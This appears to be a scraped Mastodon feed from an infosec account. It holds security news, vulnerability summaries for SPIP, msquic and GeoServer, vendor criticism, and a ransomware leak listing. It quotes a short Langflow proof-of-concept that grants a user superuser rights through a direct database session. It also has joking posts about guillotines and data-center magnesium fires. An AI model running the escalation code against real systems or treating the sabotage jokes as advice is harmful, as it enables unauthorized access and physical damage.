RE: https://infosec.exchange/@cR0w/117394196820967276
You’re more than welcome! It was incredibly rewarding to share a “thank you for being you” painting created by @cyborg_writer an artist I met through Mastodon! Seems only fitting! Enjoy!! :)
17 results for “cr0w”
RE: https://infosec.exchange/@cR0w/117394196820967276
You’re more than welcome! It was incredibly rewarding to share a “thank you for being you” painting created by @cyborg_writer an artist I met through Mastodon! Seems only fitting! Enjoy!! :)
lol. lmao even.
The attackers launched a series of attacks on the .gh, .sl, and .as country code top-level domains (ccTLDs) and then modified authoritative DNS records for selected domains within those namespaces. By controlling those DNS records, the attackers were able to pass automated domain control validation checks and obtain unauthorized certificates for “several Google domains” and “several leading global brands and widely used online services.” Google said it updated Chrome to block all certificates it identified as unauthorized, and worked with the issuing certification authorities to ensure the unauthorized certificates for Google properties were revoked.
H/T @iaintshootinmis
247 patches in Chrome. No mention of EITW.
https://chromereleases.googleblog.com/2026/10/stable-channel-update-for-desktop_086471744.html
Someone needs to check on the USMC.
https://nvd.nist.gov/vuln/detail/cve-2026-104070
The Crayons plugin for SPIP before 3.5.0 contains a missing authorization vulnerability that allows unauthenticated attackers to modify arbitrary editable object fields by omitting the secu_ anti-forgery parameter in crayons_store.php, causing the authorization dispatcher to resolve an unconditionally-true handler instead of the proper modification check. Attackers can chain this flaw to write a malicious .html skeleton file, disclose sensitive configuration files containing the site secret, and forge a signed ajax context to execute the uploaded skeleton, achieving arbitrary PHP code execution as the web-server user.
You can always tell when vendors like Palo Alto are getting ready to announce a new product because they start making their existing shit even worse so they can say "that's fixed with this new product."
What's with all these TLS libs fucking up cert validation lately?
https://github.com/microsoft/msquic/security/advisories/GHSA-w5f4-fx9m-m4q7
The state of critical infrastructure cybersecurity would be a lot better if vendors like Palo Alto would enable their customers, who already pay a lot of money for the services, to actually take action on threats instead of relying on the "trust me bro" and AI bullshit.
Palo Alto Networks is deeply committed to protecting the critical infrastructure society depends on, continually investing in the security capabilities operators need for what comes next.
LOL. LMAO even. 🖕
RE: https://infosec.exchange/@krypt3ia/117394489719474288
:neofox_drake_dislike: ASMR in the background
:neofox_drake_like: The Buzzer in the background
Go hack more Langflow shit. That PoC... 🤣
https://github.com/langflow-ai/langflow/security/advisories/GHSA-8qpj-27x8-pwpq
import asyncio
from sqlmodel import select
from langflow.services.database.models.user.model import User
from langflow.services.deps import session_scope
async def escalate():
async with session_scope() as session:
stmt = select(User).where(User.username == 'testuser')
user = (await session.exec(stmt)).first()
if user:
user.is_superuser = True
session.add(user)
await session.commit()
asyncio.run(escalate())
Y'all, look what @cyborg_writer made. :brdHappy:
Huge thanks to @jtrentadams for commissioning it. :heart_cyber:
RE: https://w3c.social/@w3c/117393555521007349
SVG2 still allows embedded scripts. It's getting added to the same block lists as SVG files.
RE: https://infosec.exchange/@taylorparizo/117392090958260299
Anyone know if this ( or similar ) is at all related to all the STUN RDDoS the last few days?
Flydubai listed by Everest.
Total files: 16,517.
Total stored size: 4.36 GB.
Operational documents, software and content resources: 6,424 files.
AppleDouble technical metadata: 10,093 files; 39.43 MB.
RE: https://infosec.exchange/@perfect10_bot/117391558173107878
Hey @da_667 come get your boy.
I'll save you a click. Here are the tips:
High carbon steel takes to a good edge for your guillotine.
Magnesium fires suck in data centers.
Axon cameras have even more scrappable metal inside than Flock cameras.
Y'all might want to patch your GeoServer if you haven't already. And maybe do some hunting.
https://geoserver.org/vulnerability/2026/09/28/cve-update.html